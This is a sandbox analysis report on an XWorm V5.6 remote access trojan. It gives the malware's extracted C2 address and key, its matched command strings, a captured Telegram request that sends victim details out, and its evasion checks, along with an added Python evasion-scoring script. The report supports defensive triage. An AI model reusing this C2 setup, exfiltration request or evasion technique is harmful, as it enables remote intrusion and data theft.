
Windows Analysis Report
XClient.exe

Overview

General Information

Sample name: XClient.exe
Analysis ID: 1582524
MD5: ca1b3f03551f41b8c83217c3af2b0d3c
SHA1: 7cebd14139aad3b194080a7210c78a6587de1de5
SHA256: e62ef733237ababe82f6b2109c70159744994515bc941b8ed025de10bb8aa624

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64_ra
  • XClient.exe (PID: 6524, cmdline: "C:\Users\user\Desktop\XClient.exe", MD5: CA1B3F03551F41B8C83217C3AF2B0D3C)
  • XClient.exe (PID: 4992, cmdline: "C:\Users\user\Desktop\XClient.exe", MD5: CA1B3F03551F41B8C83217C3AF2B0D3C)
  • cleanup

Malware Configuration

{"C2 url": ["144.48.105.119"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara Overview

Initial Sample

Source | Rule | Description | Author
XClient.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
XClient.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
XClient.exe | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Matched strings:
  • 0x6e76:$str01: $VB$Local_Port
  • 0x6e67:$str02: $VB$Local_Host
  • 0x70d3:$str03: get_Jpeg
  • 0x6b52:$str04: get_ServicePack
  • 0x7ef7:$str05: Select * from AntivirusProduct
  • 0x80f5:$str06: PCRestart
  • 0x8109:$str07: shutdown.exe /f /r /t 0
  • 0x81bb:$str08: StopReport
  • 0x8191:$str09: StopDDos
  • 0x8287:$str10: sendPlugin
  • 0x8425:$str12: -ExecutionPolicy Bypass -File "
  • 0x854e:$str13: Content-length: 5235
XClient.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x88d7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8974:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8a89:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8469:$cnc4: POST / HTTP/1.1

PCAP (spreading)

Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Memory Dumps

Source | Rule | Description | Author
00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x86d7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8774:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8889:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8269:$cnc4: POST / HTTP/1.1
Process Memory Space: XClient.exe PID: 6524 | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
Process Memory Space: XClient.exe PID: 6524 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Unpacked PEs

Source | Rule | Description | Author
0.0.XClient.exe.9b0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0.0.XClient.exe.9b0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.0.XClient.exe.9b0000.0.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  Matched strings:
  • 0x6e76:$str01: $VB$Local_Port
  • 0x6e67:$str02: $VB$Local_Host
  • 0x70d3:$str03: get_Jpeg
  • 0x6b52:$str04: get_ServicePack
  • 0x7ef7:$str05: Select * from AntivirusProduct
  • 0x80f5:$str06: PCRestart
  • 0x8109:$str07: shutdown.exe /f /r /t 0
  • 0x81bb:$str08: StopReport
  • 0x8191:$str09: StopDDos
  • 0x8287:$str10: sendPlugin
  • 0x8425:$str12: -ExecutionPolicy Bypass -File "
  • 0x854e:$str13: Content-length: 5235
0.0.XClient.exe.9b0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x88d7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8974:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8a89:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x8469:$cnc4: POST / HTTP/1.1

Sigma Overview

No Sigma rule has matched

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T20:13:41.777567+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.16 | 49702 | 149.154.167.220 | 443 | TCP
2024-12-30T20:14:59.749315+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49733 | 144.48.105.119 | 7000 | TCP
2024-12-30T20:13:41.777567+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.16 | 49702 | 149.154.167.220 | 443 | TCP


                  AV Detection

Source | Detail
XClient.exe | Avira: detected
XClient.exe | Malware Configuration Extractor: Xworm {"C2 url": ["144.48.105.119"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
XClient.exe | ReversingLabs: Detection: 76%
Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
XClient.exe | Joe Sandbox ML: detected
XClient.exe | String decryptor: 144.48.105.119
XClient.exe | String decryptor: 7000
XClient.exe | String decryptor: <123456789>
XClient.exe | String decryptor: <Xwormmm>
XClient.exe | String decryptor: XWorm V5.6
XClient.exe | String decryptor: USB.exe
XClient.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49702 version: TLS 1.2
XClient.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

Source | Detail
Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.16:49733 -> 144.48.105.119:7000
Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.16:49702 -> 149.154.167.220:443
Network traffic | Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.16:49702 -> 149.154.167.220:443
Malware configuration extractor | URLs: 144.48.105.119
unknown | DNS query: name: api.telegram.org
Yara match | File source: XClient.exe, type: SAMPLE
Yara match | File source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE
global traffic | TCP traffic: 192.168.2.16:49703 -> 144.48.105.119:7000
global traffic | HTTP traffic detected: GET /botYour_Token/sendMessage?chat_id=6170564111&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A7711B137F8E174C9CF15%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20ZLSGWO%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
Joe Sandbox View | IP Address: 149.154.167.220
Joe Sandbox View | ASN Name: DEDICATEDUS
Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
unknown | TCP traffic detected without corresponding DNS query: 144.48.105.119
global traffic | DNS traffic detected: DNS query: api.telegram.org
global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Mon, 30 Dec 2024 19:13:41 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
XClient.exe, 00000000.00000002.2402286197.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
XClient.exe | String found in binary or memory: https://api.telegram.org/bot
unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.16:49702 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source | Detail
XClient.exe, XLogger.cs | .Net Code: KeyboardLayout
C:\Users\user\Desktop\XClient.exe | Window created: window name: CLIPBRDWNDCLASS

                  System Summary

Source | Detail
XClient.exe, type: SAMPLE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
XClient.exe, type: SAMPLE | Matched rule: Detects AsyncRAT Author: ditekSHen
0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
C:\Users\user\Desktop\XClient.exe | Process Stats: CPU usage > 24%
XClient.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
XClient.exe, type: SAMPLE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
XClient.exe, type: SAMPLE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
XClient.exe, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
XClient.exe, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
XClient.exe, Settings.cs | Base64 encoded string: 'RyFdRXkpkSJGrZcI9Q/RAGUnv1WiHRoheOtS1xRCYyK4xl0FuCqakUfuj2o0HJW9', 'Ht531Lbiy/LKaeaEpNz/9rwnuEpc30YxRsPKnaINdlBP/nlOe2qifWCQwczHiGKD'
classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/0@1/2
C:\Users\user\Desktop\XClient.exe | Mutant created: \Sessions\1\BaseNamedObjects\uaKK8Ao8mnFguQUo
C:\Users\user\Desktop\XClient.exe | Mutant created: NULL
XClient.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
XClient.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
C:\Users\user\Desktop\XClient.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
XClient.exe | ReversingLabs: Detection: 76%
unknown | Process created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
unknown | Process created: C:\Users\user\Desktop\XClient.exe "C:\Users\user\Desktop\XClient.exe"
C:\Users\user\Desktop\XClient.exe | Section loaded: mscoree.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: apphelp.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: kernel.appcore.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: version.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: vcruntime140_clr0400.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: ucrtbase_clr0400.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: uxtheme.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: cryptsp.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: rsaenh.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: cryptbase.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: sspicli.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: windows.storage.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: wldp.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: profapi.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: edputil.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: wbemcomn.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: textinputframework.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: coreuicomponents.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: coremessaging.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: ntmarta.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: wintypes.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: amsi.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: userenv.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: rasapi32.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: rasman.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: rtutils.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: mswsock.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: winhttp.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: ondemandconnroutehelper.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: iphlpapi.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: dhcpcsvc6.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: dhcpcsvc.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: dnsapi.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: rasadhlp.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: fwpuclnt.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: secur32.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: schannel.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: mskeyprotect.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: ntasn1.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: ncrypt.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: ncryptsslp.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: msasn1.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: gpapi.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: avicap32.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: msvfw32.dll
C:\Users\user\Desktop\XClient.exe | Section loaded: winmm.dll
C:\Users\user\Desktop\XClient.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
XClient.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
XClient.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

Source | Detail
XClient.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
XClient.exe, Messages.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
XClient.exe, Messages.cs | .Net Code: Plugin System.AppDomain.Load(byte[])
XClient.exe, Messages.cs | .Net Code: Memory System.AppDomain.Load(byte[])
XClient.exe, Messages.cs | .Net Code: Memory
C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFEC82A9A3D push ebx; iretd 0_2_00007FFEC82A9A4A
C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFEC82A2E37 push ebx; retf 0_2_00007FFEC82A2E3A
C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFEC82A0600 push ebx; retf 0_2_00007FFEC82A060A
C:\Users\user\Desktop\XClient.exe | Code function: 0_2_00007FFEC82A06DA push ebx; retf 0_2_00007FFEC82A06EA
C:\Users\user\Desktop\XClient.exe | Code function: 12_2_00007FFEC82A06DA push ebx; retf 12_2_00007FFEC82A06EA
C:\Users\user\Desktop\XClient.exe | Code function: 12_2_00007FFEC82A0600 push ebx; retf 12_2_00007FFEC82A060A
C:\Users\user\Desktop\XClient.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\XClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XClient.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe; Memory allocated: EF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XClient.exe; Memory allocated: 1ADC0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XClient.exe; Memory allocated: 7B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XClient.exe; Memory allocated: 1A400000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XClient.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\XClient.exe; Window / User API: threadDelayed 9625
Source: C:\Users\user\Desktop\XClient.exe TID: 7052; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\XClient.exe TID: 6212; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\XClient.exe; File Volume queried: C:\ FullSizeInformation
Source: XClient.exe, 00000000.00000002.2405666189.000000001BA1F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XClient.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\XClient.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\XClient.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\XClient.exe; Queries volume information: C:\Users\user\Desktop\XClient.exe VolumeInformation
Source: C:\Users\user\Desktop\XClient.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: XClient.exe, 00000000.00000002.2406664029.000000001D0D0000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2406664029.000000001D0E2000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2405666189.000000001B9FF000.00000004.00000020.00020000.00000000.sdmp, XClient.exe, 00000000.00000002.2405666189.000000001BA1F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: XClient.exe, 00000000.00000002.2406664029.000000001D0E2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ogramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\XClient.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
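
The entries in this section are the sandbox's raw observations, one per call, so the same WMI query or volume lookup shows up dozens of times. What a triager usually wants is the collapsed view: which environment checks fired, how often, and whether the observed delays are long enough to stall analysis. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the XWorm sample. Its indicator table, weights, 3-minute threshold and ATT&CK mappings are assumptions; SAMPLE_LINES are trimmed copies of entries shown above. One check is exact rather than assumed: 922337203685477 is 2^63 units of 100 ns expressed in milliseconds, which is how an infinite wait arrives at NtDelayExecution, so the listed "delay time" is a sleep-forever call, not a timed wait.

```python
"""Collapse and score sandbox behaviour entries for evasion indicators.

Added example, not code from the Joe Sandbox report or from the XWorm
sample. SAMPLE_LINES are trimmed copies of entries shown in this report;
the indicator table, weights, threshold and ATT&CK mappings are this
example's own assumptions.
"""
import json
import re
from collections import Counter

# An infinite wait reaches NtDelayExecution as a relative timeout of 2**63
# units of 100 ns; in milliseconds that is 922337203685477, exactly the
# "delay time" value the report lists for the sample's thread delays.
INFINITE_WAIT_MS = 2**63 // 10_000

# Sleeps at or above this are treated as analysis stalling (assumption: 3 min).
LONG_SLEEP_MS = 3 * 60 * 1000

# (indicator, regex over one behaviour line, weight, ATT&CK technique).
# Weights and technique mappings are assumptions, not part of the report.
INDICATORS = [
    ("wmi_video_controller", r"Win32_VideoController", 2, "T1497.001"),
    ("wmi_securitycenter_av",
     r"root\\SecurityCenter2\s*:\s*Select \* from AntivirusProduct", 2, "T1518.001"),
    ("volume_size_query", r"File Volume queried: .*FullSizeInformation", 1, "T1497.001"),
    ("machineguid_read", r"Cryptography MachineGuid", 1, "T1082"),
    ("memory_write_watch", r"memory write watch", 1, "T1497"),
    ("debug_privilege", r"Process token adjusted: Debug", 1, "T1134"),
]
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")

# Constructed sample: trimmed copies of behaviour entries from this report.
SAMPLE_LINES = [
    r"WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController",
    r"WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController",
    r"Memory allocated: EF0000 memory reserve | memory write watch",
    r"Memory allocated: 1ADC0000 memory reserve | memory write watch",
    r"Thread delayed: delay time: 922337203685477",
    r"Thread delayed: delay time: 922337203685477",
    r"Window / User API: threadDelayed 9625",
    r"File Volume queried: C:\ FullSizeInformation",
    r"File Volume queried: C:\ FullSizeInformation",
    r"Process token adjusted: Debug",
    r"Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid",
    r"WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct",
    r"Process information set: NOOPENFILEERRORBOX",   # noise: no indicator should fire
]


def parse_delay_ms(line):
    """Return the delay from a 'Thread delayed' entry as an int, else None."""
    m = DELAY_RE.search(line)
    return int(m.group(1)) if m else None


def is_infinite_wait(delay_ms):
    """True when the delay is the kernel representation of an infinite wait."""
    return delay_ms == INFINITE_WAIT_MS


def triage(lines):
    """Collapse duplicate entries, match indicators and return score, verdict, hits."""
    counts = Counter(line.strip() for line in lines)
    hits, score = {}, 0
    for name, pattern, weight, technique in INDICATORS:
        rx = re.compile(pattern, re.IGNORECASE)
        occurrences = sum(c for text, c in counts.items() if rx.search(text))
        if occurrences:
            hits[name] = {"occurrences": occurrences, "technique": technique}
            score += weight  # weight once per indicator, not once per repetition
    sleeps = []
    for text, c in counts.items():
        ms = parse_delay_ms(text)
        if ms is not None and ms >= LONG_SLEEP_MS:
            sleeps.extend([ms] * c)
    if sleeps:
        hits["long_sleep"] = {
            "occurrences": len(sleeps),
            "max_ms": max(sleeps),
            "infinite": any(is_infinite_wait(ms) for ms in sleeps),
            "technique": "T1497.003",
        }
        score += 2
    verdict = "sandbox-aware" if score >= 6 else "no strong evasion signal"
    return {"score": score, "verdict": verdict, "hits": hits, "unique_lines": len(counts)}


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

Each indicator is weighted once no matter how many times it repeats; the repetition count is kept separately because a loop of AntivirusProduct queries says something different from a single lookup, but it should not inflate the score by itself. Run as a script, the block prints the collapsed result for the constructed sample.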

                  Stealing of Sensitive Information

Source: Yara match; File source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: XClient.exe, type: SAMPLE
Source: Yara match; File source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match; File source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: XClient.exe, type: SAMPLE
Source: Yara match; File source: 0.0.XClient.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000000.1140164033.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: XClient.exe PID: 6524, type: MEMORYSTR

MITRE ATT&CK matrix, listed per tactic. Bracketed digits are the report's signature-count badges copied as extracted; techniques without a count are the matrix's unmatched placeholders.
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [11]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [131]; Process Injection [1]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [11]; Software Packing [2]; DLL Side-Loading [1]
Credential Access: Input Capture [1]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [121]; Process Discovery [1]; Virtualization/Sandbox Evasion [131]; Application Window Discovery [1]; System Information Discovery [13]; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Input Capture [1]; Archive Collected Data [1]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Web Service [1]; Encrypted Channel [1]; Non-Standard Port [1]; Ingress Tool Transfer [3]; Non-Application Layer Protocol [3]; Application Layer Protocol [14]; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
